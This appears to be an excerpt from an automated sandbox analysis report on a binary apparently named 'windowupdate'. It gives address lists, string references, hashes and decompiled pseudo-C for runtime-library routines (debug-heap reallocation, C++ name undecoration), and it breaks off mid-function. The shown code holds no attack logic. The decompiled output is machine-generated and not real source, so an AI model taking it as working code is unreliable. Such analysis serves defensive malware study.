                      0x00d8766c
                      0x00d87670
                      0x00d876da
                      0x00d876de
                      0x00d876e3
                      0x00d876e9
                      0x00d876eb
                      0x00d8771e
                      0x00d87722
                      0x00d87727
                      0x00d8772a
                      0x00d8772c
                      0x00d87746
                      0x00d8774b
                      0x00d8774e
                      0x00d87751
                      0x00d87753
                      0x00d87753
                      0x00d87751
                      0x00d87758
                      0x00d8775d
                      0x00d87760
                      0x00d87763
                      0x00d87766
                      0x00d8776a
                      0x00d87772
                      0x00d8776c
                      0x00d8776c
                      0x00d8776c
                      0x00d87779
                      0x00d87780
                      0x00d87782
                      0x00d877c4
                      0x00d877ca
                      0x00d877cd
                      0x00000000
                      0x00000000
                      0x00d877e0
                      0x00d877e8
                      0x00d877eb
                      0x00d877ed
                      0x00d877ed
                      0x00d877f3
                      0x00000000
                      0x00d87784
                      0x00d87787
                      0x00d8778e
                      0x00d87799
                      0x00d877b1
                      0x00d877b6
                      0x00d877b9
                      0x00d877bc
                      0x00d877be
                      0x00d877be
                      0x00d877bf
                      0x00d87800
                      0x00d87800
                      0x00d87803
                      0x00d87806
                      0x00d87822
                      0x00d87825
                      0x00d8782c
                      0x00d87830
                      0x00d87832
                      0x00d8785e
                      0x00d87863
                      0x00d87866
                      0x00d87869
                      0x00d8786d
                      0x00d87876
                      0x00d87876
                      0x00d8787e
                      0x00d87883
                      0x00d87887
                      0x00d87889
                      0x00d8788f
                      0x00d87896
                      0x00d8789b
                      0x00d878a3
                      0x00d878b4
                      0x00d878b6
                      0x00d878c2
                      0x00d878b8
                      0x00d878bd
                      0x00d878bd
                      0x00d878c9
                      0x00d878cf
                      0x00d878cf
                      0x00d878d2
                      0x00d878d2
                      0x00d878db
                      0x00d878e4
                      0x00d878ed
                      0x00d878f4
                      0x00d878f9
                      0x00d878ff
                      0x00d87905
                      0x00d87907
                      0x00d8790d
                      0x00d8790d
                      0x00d87905
                      0x00d87917
                      0x00d8791c
                      0x00d8791f
                      0x00d87925
                      0x00d8792a
                      0x00d8792d
                      0x00d87946
                      0x00d8794a
                      0x00d8794f
                      0x00d8794f
                      0x00d87962
                      0x00d87967
                      0x00d8796e
                      0x00d87970
                      0x00d87978
                      0x00d87981
                      0x00d8798a
                      0x00d8798a
                      0x00d87995
                      0x00d8799c
                      0x00d8799e
                      0x00d879d6
                      0x00d879d9
                      0x00d879dc
                      0x00d879e6
                      0x00000000
                      0x00d879e6
                      0x00d879e2
                      0x00d879e4
                      0x00d879f1
                      0x00d879f4
                      0x00d87a06
                      0x00d87a0c
                      0x00d87a0f
                      0x00d87a29
                      0x00d87a2e
                      0x00d87a31
                      0x00d87a34
                      0x00d87a36
                      0x00d87a36
                      0x00d87a34
                      0x00d87a3d
                      0x00d879f6
                      0x00d87a01
                      0x00d87a01
                      0x00d87a43
                      0x00d87a46
                      0x00d87a4a
                      0x00d87a5b
                      0x00d87a61
                      0x00d87a64
                      0x00d87a7e
                      0x00d87a86
                      0x00d87a89
                      0x00d87a8b
                      0x00d87a8b
                      0x00d87a89
                      0x00d87a91
                      0x00d87a4c
                      0x00d87a57
                      0x00d87a57
                      0x00d87a97
                      0x00d87a9e
                      0x00d87ab0
                      0x00d87aa0
                      0x00d87aa0
                      0x00d87aa8
                      0x00d87aa8
                      0x00d87ab9
                      0x00d87abf
                      0x00d87ac4
                      0x00d87ace
                      0x00000000
                      0x00d87ad3
                      0x00000000
                      0x00d879a0
                      0x00d879a4
                      0x00d879a6
                      0x00d879b0
                      0x00d879c8
                      0x00d879cd
                      0x00d879d0
                      0x00d879d3
                      0x00d879d5
                      0x00d879d5
                      0x00000000
                      0x00d879d3
                      0x00d879ab
                      0x00d879ae
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d879ae
                      0x00d8799e
                      0x00000000
                      0x00d8786f
                      0x00d8783c
                      0x00d87841
                      0x00d87844
                      0x00d87847
                      0x00d8784b
                      0x00000000
                      0x00d87854
                      0x00000000
                      0x00d8784d
                      0x00d8780d
                      0x00000000
                      0x00d87813
                      0x00d87793
                      0x00d87797
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d87797
                      0x00d87782
                      0x00d876ed
                      0x00d876fe
                      0x00d87706
                      0x00d87709
                      0x00d8770b
                      0x00d8770b
                      0x00d87711
                      0x00000000
                      0x00d87717
                      0x00d8767b
                      0x00d8767e
                      0x00000000
                      0x00000000
                      0x00d87688
                      0x00d8768b
                      0x00000000
                      0x00000000
                      0x00d8768d
                      0x00d87691
                      0x00d876ca
                      0x00d876cf
                      0x00d876d2
                      0x00d876d5
                      0x00d876d7
                      0x00d876d7
                      0x00d87693
                      0x00d87696
                      0x00d876a8
                      0x00d876ad
                      0x00d876b0
                      0x00d876b3
                      0x00d876b5
                      0x00d876b5
                      0x00d876b6
                      0x00000000
                      0x00d876d8
                      0x00d875ff
                      0x00d87604
                      0x00d87607
                      0x00d8760a
                      0x00d87610
                      0x00d87613
                      0x00d87616
                      0x00d87618
                      0x00000000
                      0x00000000
                      0x00d8761a
                      0x00d8761e
                      0x00d87657
                      0x00d8765f
                      0x00d87662
                      0x00d87664
                      0x00d87664
                      0x00d87665
                      0x00000000
                      0x00d87665
                      0x00d87623
                      0x00d87635
                      0x00d8763d
                      0x00d87640
                      0x00d87642
                      0x00d87642
                      0x00000000
                      0x00d87595
                      0x00d87598
                      0x00d8759b
                      0x00000000
                      0x00d8759d
                      0x00d875a5
                      0x00000000
                      0x00d875ad
                      0x00d8759b

                      APIs
                      Strings
                      • Client hook re-allocation failure at file %hs line %d., xrefs: 00D87628
                      • _CrtIsValidHeapPointer(block), xrefs: 00D8772E
                      • Error: memory allocation: bad memory block type., xrefs: 00D876B8
                      • __acrt_last_block == old_head, xrefs: 00D87A11
                      • Error: memory allocation: bad memory block type.Memory allocated at %hs(%d)., xrefs: 00D8769B
                      • The Block at 0x%p was allocated by aligned routines, use _aligned_realloc(), xrefs: 00D876F1
                      • reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head), xrefs: 00D879B0
                      • minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00D8773F, 00D877AA, 00D879C1, 00D87A22, 00D87A77
                      • __acrt_first_block == old_head, xrefs: 00D87A66
                      • Error: possible heap corruption at or near 0x%p, xrefs: 00D877D3
                      • Client hook re-allocation failure., xrefs: 00D87645
                      • old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks, xrefs: 00D87799
                      • %ls, xrefs: 00D87733, 00D8779E, 00D879B5, 00D87A16, 00D87A6B
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __wcstombs_l
                      • String ID: %ls$Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtIsValidHeapPointer(block)$__acrt_first_block == old_head$__acrt_last_block == old_head$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks$reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
                      • API String ID: 3007373345-458177602
                      • Opcode ID: eca23fdd420a71fbf674e47b218cd9c863c28ff89436c911d825645cde351de2
                      • Instruction ID: b75ba0b7d2b0e4e983770e8513dc6ebfc49ed564cce6a9960ad91cb2abc7cbc4
                      • Opcode Fuzzy Hash: eca23fdd420a71fbf674e47b218cd9c863c28ff89436c911d825645cde351de2
                      • Instruction Fuzzy Hash: 6D02AD74A04209AFDB14EF54DC86FAE7BB1FB85700F248149E9159B392D770EA41CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D58210 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 185COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D58210(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v5;
				signed int _v6;
				signed char _v7;
				signed char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v28;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				char* _t60;
				char* _t66;
				void* _t67;
				char _t75;
				intOrPtr _t81;
				void* _t83;
				intOrPtr _t85;
				void* _t90;
				intOrPtr _t97;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t118;
				char* _t121;
				char* _t122;
				char* _t123;
				intOrPtr _t124;
				char* _t126;
				intOrPtr _t129;
				void* _t138;
				void* _t139;
				void* _t140;

				_t139 = __esi;
				_t138 = __edi;
				_t90 = __ebx;
				_v6 = 1;
				E00D4F3F0( &_v36);
				 *0xf2064d = 1;
				while(E00D5AB70( &_v36) == 0) {
					_t60 =  *0xf20640; // 0x0
					if( *_t60 == 0) {
						break;
					}
					_t121 =  *0xf20640; // 0x0
					if( *_t121 == 0x40) {
						break;
					}
					_v7 = 0;
					if((_v6 & 0x000000ff) == 0) {
						_v7 = 1;
					} else {
						_v6 = 0;
					}
					_t122 =  *0xf20640; // 0x0
					_v16 =  *_t122 - 0x30;
					E00D4F3F0( &_v28);
					_v8 = 0;
					if(_v16 < 0 || _v16 > 9) {
						_t97 =  *0xf20640; // 0x0
						_v20 = _t97;
						_t123 =  *0xf20640; // 0x0
						if( *_t123 != 0x24) {
							L21:
							_t66 =  *0xf20640; // 0x0
							if( *_t66 != 0x24) {
								L24:
								_t67 = E00D58D00(_t90, _t138, _t139,  &_v68);
								_t140 = _t140 + 4;
								E00D4F820( &_v28, _t67);
								L25:
								_t124 =  *0xf20640; // 0x0
								if(_t124 - _v20 > 1) {
									_t109 =  *0xf2063c; // 0x0
									if(E00D5A590(_t109) == 0) {
										_t110 =  *0xf2063c; // 0x0
										E00D4FF70(_t110,  &_v28);
									}
								}
								goto L28;
							}
							_t81 =  *0xf20640; // 0x0
							if( *((char*)(_t81 + (1 << 0))) == 0x24) {
								goto L24;
							}
							_t129 =  *0xf20640; // 0x0
							 *0xf20640 = _t129 + 1;
							_t83 = E00D586C0(_t90, _t138, _t139,  &_v60);
							_t140 = _t140 + 4;
							E00D4F820( &_v28, _t83);
							goto L25;
						}
						_t113 =  *0xf20640; // 0x0
						if( *((char*)(_t113 + 1)) != 0x24) {
							goto L21;
						}
						_v5 = 0;
						_t85 =  *0xf20640; // 0x0
						_v12 =  *((char*)(_t85 + 2));
						_v12 = _v12 - 0x24;
						if(_v12 > 0x36) {
							L19:
							if((_v5 & 0x000000ff) == 0) {
								goto L21;
							} else {
								continue;
							}
						}
						_t25 = _v12 + 0xd584bc; // 0xcccccc02
						switch( *((intOrPtr*)(( *_t25 & 0x000000ff) * 4 +  &M00D584A8))) {
							case 0:
								__edx =  *0xf20640;
								__eax =  *((char*)(__edx + 3));
								if( *((char*)(__edx + 3)) == 0x56) {
									__ecx =  *0xf20640; // 0x0
									__ecx = __ecx + 4;
									 *0xf20640 = __ecx;
									_v5 = 1;
								}
								goto L19;
							case 1:
								 *0xf20640 =  *0xf20640 + 3;
								 *0xf20640 =  *0xf20640 + 3;
								goto L19;
							case 2:
								__ecx =  *0xf20640;
								__ecx =  *0xf20640 + 3;
								 *0xf20640 = __ecx;
								_v5 = 1;
								goto L19;
							case 3:
								_v8 = 1;
								_t135 =  *0xf20640; // 0x0
								 *0xf20640 = _t135 + 3;
								goto L19;
							case 4:
								goto L19;
						}
					} else {
						_t116 =  *0xf20640; // 0x0
						 *0xf20640 = _t116 + 1;
						_t118 =  *0xf2063c; // 0x0
						E00D4F820( &_v28, E00D4F9A0(_t118,  &_v52, _v16));
						L28:
						if(E00D5A560( &_v28) != 0) {
							if(E00D5A6C0( &_v28) != 0) {
								L36:
								continue;
							}
							E00D4F350(_a4, 2);
							return _a4;
						}
						if((_v7 & 0x000000ff) != 0) {
							E00D4FDE0( &_v36, 0x2c);
						}
						_t126 =  &_v28;
						E00D4FD40( &_v36, _t126);
						if((_v8 & 0x000000ff) != 0) {
							_t75 = E00D50060("...", 3);
							_t140 = _t140 + 8;
							_v44 = _t75;
							_v40 = _t126;
							E00D4FCA0( &_v36,  &_v44);
						}
						goto L36;
					}
				}
				 *0xf2064d = 0;
				E00D4F240(_a4,  &_v36);
				return _a4;
			}








































                      0x00d58210
                      0x00d58210
                      0x00d58210
                      0x00d58216
                      0x00d5821d
                      0x00d58222
                      0x00d58229
                      0x00d58239
                      0x00d58243
                      0x00000000
                      0x00000000
                      0x00d58249
                      0x00d58255
                      0x00000000
                      0x00000000
                      0x00d5825b
                      0x00d58265
                      0x00d5826d
                      0x00d58267
                      0x00d58267
                      0x00d58267
                      0x00d58271
                      0x00d5827d
                      0x00d58283
                      0x00d58288
                      0x00d58290
                      0x00d582c8
                      0x00d582ce
                      0x00d582d1
                      0x00d582dd
                      0x00d5838e
                      0x00d5838e
                      0x00d58399
                      0x00d583d7
                      0x00d583db
                      0x00d583e0
                      0x00d583e7
                      0x00d583ec
                      0x00d583ec
                      0x00d583f8
                      0x00d583fa
                      0x00d58407
                      0x00d5840d
                      0x00d58413
                      0x00d58413
                      0x00d58407
                      0x00000000
                      0x00d583f8
                      0x00d583a3
                      0x00d583af
                      0x00000000
                      0x00000000
                      0x00d583b1
                      0x00d583ba
                      0x00d583c4
                      0x00d583c9
                      0x00d583d0
                      0x00000000
                      0x00d583d0
                      0x00d582e3
                      0x00d582f0
                      0x00000000
                      0x00000000
                      0x00d582f6
                      0x00d582fa
                      0x00d58303
                      0x00d5830c
                      0x00d58313
                      0x00d58381
                      0x00d58387
                      0x00000000
                      0x00d58389
                      0x00000000
                      0x00d58389
                      0x00d58387
                      0x00d58318
                      0x00d5831f
                      0x00000000
                      0x00d5835f
                      0x00d58365
                      0x00d5836c
                      0x00d5836e
                      0x00d58374
                      0x00d58377
                      0x00d5837d
                      0x00d5837d
                      0x00000000
                      0x00000000
                      0x00d58340
                      0x00d58343
                      0x00000000
                      0x00000000
                      0x00d5834a
                      0x00d58350
                      0x00d58353
                      0x00d58359
                      0x00000000
                      0x00000000
                      0x00d58326
                      0x00d5832a
                      0x00d58333
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d58298
                      0x00d58298
                      0x00d582a1
                      0x00d582af
                      0x00d582be
                      0x00d58418
                      0x00d58422
                      0x00d58477
                      0x00d58488
                      0x00000000
                      0x00d58488
                      0x00d5847e
                      0x00000000
                      0x00d58483
                      0x00d5842a
                      0x00d58431
                      0x00d58431
                      0x00d58436
                      0x00d5843d
                      0x00d58448
                      0x00d58451
                      0x00d58456
                      0x00d58459
                      0x00d5845c
                      0x00d58466
                      0x00d58466
                      0x00000000
                      0x00d5846b
                      0x00d58290
                      0x00d5848d
                      0x00d5849b
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$Iterator_baseIterator_base::_Name::isstd::_$EmptyFullNameName::Name::operator+=Replicator::isReplicator::operator+=Valid
                      • String ID: ...$6
                      • API String ID: 2413373717-4106199456
                      • Opcode ID: ca95b10de3820380f46c04bc7e29bc597391fccf0d1c2874aabf261ff6468cda
                      • Instruction ID: ce79900fea44320587d1bd5ea7555791994bf2e892e6c2b6706ad61e74343ae6
                      • Opcode Fuzzy Hash: ca95b10de3820380f46c04bc7e29bc597391fccf0d1c2874aabf261ff6468cda
                      • Instruction Fuzzy Hash: 2571D1719041589BEF24DF94D891ABE7FB1BF81306F084069DC06BB262DF349949EBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D54900 Relevance: 24.2, APIs: 16, Instructions: 187COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00D54900(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed char _a8) {
				signed int _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				char _v128;
				char _v136;
				char _v144;
				char _v152;
				char _v160;
				char _v168;
				char* _t70;
				char* _t71;
				intOrPtr* _t81;
				char* _t99;
				void* _t113;
				char* _t136;
				intOrPtr _t137;
				char* _t142;
				char* _t146;
				char* _t147;
				intOrPtr _t149;
				char _t157;
				intOrPtr _t160;
				intOrPtr _t163;
				void* _t165;
				void* _t166;

				_t166 = __esi;
				_t165 = __edi;
				_t113 = __ebx;
				_v5 = 0;
				_t70 =  *0xf20640; // 0x0
				if( *_t70 == 0x51) {
					_v5 = 1;
					_t163 =  *0xf20640; // 0x0
					 *0xf20640 = _t163 + 1;
				}
				_t71 =  *0xf20640; // 0x0
				if( *_t71 != 0) {
					_t146 =  *0xf20640; // 0x0
					if( *_t146 < 0x30) {
						L10:
						E00D59C90( &_v80);
						if((E00D4FA10( &_v80) & 0x000000ff) == 0) {
							_t147 =  *0xf20640; // 0x0
							if( *_t147 != 0) {
								_v32 = E00D4F350( &_v168, 2);
							} else {
								_v32 = E00D4F350( &_v160, 1);
							}
							_v48 = _v32;
							E00D4F240(_a4, _v48);
							return _a4;
						}
						_t149 =  *0xf20640; // 0x0
						 *0xf20640 = _t149 + 1;
						_t81 = E00D4FA30( &_v80);
						_v16 =  *_t81;
						_v12 =  *((intOrPtr*)(_t81 + 4));
						if((_a8 & 0x000000ff) == 0) {
							if((_v5 & 0x000000ff) == 0) {
								_v28 = E00D4F510(_t113,  &_v152, _t165, _t166, _v16, _v12);
							} else {
								_v28 = E00D4FAA0( &_v144, 0xdf6030, E00D4F510(_t113,  &_v136, _t165, _t166, _v16, _v12));
							}
							_v44 = _v28;
							E00D4F240(_a4, _v44);
							return _a4;
						}
						if((_v5 & 0x000000ff) == 0) {
							_v24 = E00D4F420(_t113,  &_v128, _t165, _t166, _v16, _v12);
						} else {
							_v24 = E00D4FAA0( &_v120, 0xdf6030, E00D4F420(_t113,  &_v112, _t165, _t166, _v16, _v12));
						}
						_v40 = _v24;
						E00D4F240(_a4, _v40);
						return _a4;
					}
					_t136 =  *0xf20640; // 0x0
					_t157 =  *_t136;
					if(_t157 > 0x39) {
						goto L10;
					}
					if((_v5 & 0x000000ff) == 0) {
						_t99 =  *0xf20640; // 0x0
						asm("cdq");
						_v64 =  *_t99 - 0x2f;
						_v60 = _t157;
						_t137 =  *0xf20640; // 0x0
						 *0xf20640 = _t137 + 1;
						_v20 = E00D4F510(_t113,  &_v104, _t165, _t166, _v64, _v60);
					} else {
						_t142 =  *0xf20640; // 0x0
						asm("cdq");
						_v56 =  *_t142 - 0x2f;
						_v52 = _t157;
						_t160 =  *0xf20640; // 0x0
						 *0xf20640 = _t160 + 1;
						_v20 = E00D4FAA0( &_v96, 0xdf6030, E00D4F510(_t113,  &_v88, _t165, _t166, _v56, _v52));
					}
					_v36 = _v20;
					E00D4F240(_a4, _v36);
					return _a4;
				} else {
					E00D4F350(_a4, 1);
					return _a4;
				}
			}














































                      0x00d54900
                      0x00d54900
                      0x00d54900
                      0x00d54909
                      0x00d5490d
                      0x00d54918
                      0x00d5491a
                      0x00d5491e
                      0x00d54927
                      0x00d54927
                      0x00d5492d
                      0x00d54937
                      0x00d5494b
                      0x00d54957
                      0x00d54a0e
                      0x00d54a12
                      0x00d54a27
                      0x00d54b17
                      0x00d54b22
                      0x00d54b43
                      0x00d54b24
                      0x00d54b31
                      0x00d54b31
                      0x00d54b49
                      0x00d54b53
                      0x00000000
                      0x00d54b58
                      0x00d54a2d
                      0x00d54a36
                      0x00d54a3f
                      0x00d54a49
                      0x00d54a4c
                      0x00d54a55
                      0x00d54abb
                      0x00d54afd
                      0x00d54abd
                      0x00d54ae5
                      0x00d54ae5
                      0x00d54b03
                      0x00d54b0d
                      0x00000000
                      0x00d54b12
                      0x00d54a5d
                      0x00d54a96
                      0x00d54a5f
                      0x00d54a81
                      0x00d54a81
                      0x00d54a9c
                      0x00d54aa6
                      0x00000000
                      0x00d54aab
                      0x00d5495d
                      0x00d54963
                      0x00d54969
                      0x00000000
                      0x00000000
                      0x00d54975
                      0x00d549c0
                      0x00d549cb
                      0x00d549cc
                      0x00d549cf
                      0x00d549d2
                      0x00d549db
                      0x00d549f1
                      0x00d54977
                      0x00d54977
                      0x00d54983
                      0x00d54984
                      0x00d54987
                      0x00d5498a
                      0x00d54993
                      0x00d549bb
                      0x00d549bb
                      0x00d549f7
                      0x00d54a01
                      0x00000000
                      0x00d54939
                      0x00d5493e
                      0x00000000
                      0x00d54943

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D5493E
                      • operator+.LIBVCRUNTIMED ref: 00D549B3
                        • Part of subcall function 00D4FAA0: DName::operator+.LIBCMTD ref: 00D4FAC0
                      • DName::DName.LIBVCRUNTIMED ref: 00D549A4
                        • Part of subcall function 00D4F510: __aullrem.LIBCMT ref: 00D4F557
                        • Part of subcall function 00D4F510: __aulldiv.LIBCMT ref: 00D4F570
                      • DName::DName.LIBVCRUNTIMED ref: 00D549EC
                      • Mailbox.LIBCMTD ref: 00D54A01
                      • DName::DName.LIBVCRUNTIMED ref: 00D54A6A
                      • operator+.LIBVCRUNTIMED ref: 00D54A79
                      • DName::DName.LIBVCRUNTIMED ref: 00D54A91
                      • Mailbox.LIBCMTD ref: 00D54AA6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: NameName::$Mailboxoperator+$Name::operator+__aulldiv__aullrem
                      • String ID:
                      • API String ID: 2030757049-0
                      • Opcode ID: 1697ba1a25da6aff486a29fd7e1192a8a3dd11ad5aba72ac37eff19b0e34788a
                      • Instruction ID: fe2e44b895a9933b6efc5a9fd3a9eabe7603ebe1e4f2c3328ce5ed027a26cc3a
                      • Opcode Fuzzy Hash: 1697ba1a25da6aff486a29fd7e1192a8a3dd11ad5aba72ac37eff19b0e34788a
                      • Instruction Fuzzy Hash: 15717571D04118AFDF14DF94D8919EEBBB5FF88305F148169E819A7261DB30AA45CF70
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D386D0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 411COMMON
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E00D386D0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v57;
				signed int _v64;
				char _v72;
				signed int _v84;
				signed int _v96;
				signed int _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				char _v124;
				signed int _v136;
				signed int _v156;
				char _v168;
				signed int _v180;
				char _v192;
				signed int _v200;
				signed int _v201;
				signed int _v220;
				signed int _v240;
				signed int _v252;
				signed int _v264;
				signed int _v284;
				signed int _v289;
				signed int _v308;
				signed int _v328;
				signed int _v340;
				signed int _v352;
				signed int _v360;
				signed int _v364;
				char _v1396;
				signed int _v1404;
				CHAR* _v1408;
				CHAR* _v1412;
				signed int _v1428;
				signed int _v1433;
				signed int _v1452;
				signed int _v1472;
				signed int _v1484;
				signed int _v1496;
				signed int _v1508;
				char _v1520;
				signed int _v1540;
				signed int _v1545;
				void _v1564;
				signed int _v1584;
				void _v1596;
				signed int _v1608;
				signed int _v1620;
				char _v2656;
				signed int _v2668;
				signed int _v2676;
				signed int _v2680;
				signed int _v2696;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				intOrPtr _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				intOrPtr _v2736;
				intOrPtr _v2740;
				intOrPtr _v2744;
				char _v2752;
				char _v2760;
				intOrPtr _v2764;
				intOrPtr _v2768;
				intOrPtr _v2772;
				intOrPtr _v2776;
				char _v2784;
				char _v2792;
				intOrPtr _v2796;
				intOrPtr _v2800;
				intOrPtr _v2804;
				char _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				void _v2908;
				signed int _t754;
				signed int _t755;
				signed int _t769;
				void* _t775;
				signed int _t783;
				signed int _t805;
				signed int _t807;
				signed int _t817;
				void* _t818;
				intOrPtr _t820;

				_push(0xffffffff);
				_push(0xdc4ec4);
				_push( *[fs:0x0]);
				memset( &_v2908, 0xcccccccc, 0x2d2 << 2);
				_t820 = _t818 - 0xb48 + 0xc;
				_pop(_t783);
				_t754 =  *0xdf600c; // 0x71e60372
				_t755 = _t754 ^ _t817;
				_v24 = _t755;
				_push(_t755);
				 *[fs:0x0] =  &_v16;
				_v20 = _t820;
				_v28 = _t783;
				E00D341C0( &_v44, 0);
				_v8 = 0;
				_v52 = 0;
				_v56 = 0;
				_v57 = 0;
				_v64 = 0;
				_v104 = 0;
				_v108 = E00D31AB0();
				_v112 = 0;
				_v116 = 0;
				E00D3F2E0( &_v124);
				_v8 = 1;
				_t805 =  *( *_a8);
				E00D3A0F0(_v28, _t805,  &_v72,  &_v84,  &_v96);
				while(_v72 != 6) {
					_v2820 = _v72;
					if(_v2820 > 0xb) {
						_t805 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t775 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x31a, 0, "%ls", 0xde40dc);
							_t820 = _t820 + 0x18;
							__eflags = _t775 - 1;
							if(_t775 == 1) {
								asm("int3");
							}
						}
						L204:
						continue;
					}
					switch( *((intOrPtr*)(_v2820 * 4 +  &M00D3A0BC))) {
						case 0:
							_v2704 = 0;
							_v8 = 0;
							E00D3F220( &_v124);
							_v8 = 0xffffffff;
							E00D34220( &_v44, _t824);
							_t769 = _v2704;
							goto L206;
						case 1:
							_v57 = 1;
							__eflags = _a24;
							if(__eflags == 0) {
								L8:
